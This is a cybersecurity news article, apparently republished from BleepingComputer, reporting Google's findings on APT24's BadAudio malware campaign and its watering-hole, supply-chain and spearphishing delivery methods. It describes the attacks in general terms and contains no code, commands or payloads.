Cybersecurity

Google Exposes Badaudio Malware Used In Apt24 Espionage Campaigns

2025-11-20 10 views admin
Google Exposes Badaudio Malware Used In Apt24 Espionage Campaigns

China-linked APT24 hackers have been using a previously undocumented malware called BadAudio in a three-year espionage campaign that recently switched to more sophisticated attack methods.

Since 2022, the malware has been delivered to victims through multiple methods that include spearphishing, supply-chain compromise, and watering hole attacks.

From November 2022 until at least September 2025, APT24 compromised more than 20 legitimate public websites from various domains to inject malicious JavaScript code that selected visitors of interest - the focus was exclusively on Windows systems.

Researchers at Google Threat Intelligence Group (GTIG) say that the script fingerprinted visitors who qualified as targets and loaded a fake software update pop-up to lure them into downloading BadAudio.

Starting July 2024, APT24 compromised multiple times a digital marketing company in Taiwan that provides JavaScript libraries to client websites.

Through this tactic, the attackers injected malicious JavaScript into a widely used library that the firm distributed, and registered a domain name that impersonated a legitimate Content Delivery Network (CDN). This enabled the attacker to compromise more than 1,000 domains.

From late 2024 until July 2025, APT24 repeatedly compromised the same marketing firm by injecting malicious, obfuscated JavaScript into a modified JSON file, which was loaded by a separate JavaScript file from the same vendor.

Once executed, it fingerprinted each website visitor and sent a base64-encoded report to the attackers' server, allowing them to decide if they would reply with the next-stage URL.

In parallel, starting from August 2024, APT24 launched spearphishing operations that delivered the BadAudio malware using as lures emails that impersonated animal rescue organizations.

In some variants of these attacks, APT24 used legitimate cloud services like Google Drive and OneDrive for malware distribution, instead of their own servers. However, Google says that many of the attempts were detected, and the messages ended up in the spam box.

Source: BleepingComputer

🏷️ Tags

hackmalwareattackthreat

More from Cybersecurity

Update: Attackers Exploit Zero-day In End-of-life D-link Routers 2026

Update: Attackers Exploit Zero-day In End-of-life D-link Routers 2026

2026-01-07 0
Critical Jspdf Flaw Lets Hackers Steal Secrets Via Generated Pdfs - Complete Guide

Critical Jspdf Flaw Lets Hackers Steal Secrets Via Generated Pdfs - Complete Guide

2026-01-07 0
Phishers Exploit Office 365 Users Who Let Their Guard Down 2026 - Analysis

Phishers Exploit Office 365 Users Who Let Their Guard Down 2026 - Analysis

2026-01-07 0
Breaking: Logitech Options+, G Hub Macos Apps Break After Certificate Expires

Breaking: Logitech Options+, G Hub Macos Apps Break After Certificate Expires

2026-01-07 0

Trending

1

CVE-2025-61481: Critical Remote Code Execution Vulnerability in MikroTik RouterOS & SwitchOS

2025-10-27 • 189 views
2

CVE-2025-43939: Dell Unity OS Command Injection (High)

2025-10-30 • 148 views
3

Google disputes false claims of massive Gmail data breach

2025-10-30 • 130 views
4

Microsoft: DNS outage impacts Azure and Microsoft 365 services

2025-10-30 • 88 views
5

3.5B Accounts, 1 Critical Flaw: Meta Closes WhatsApp Data-Harvesting

2025-11-25 • 81 views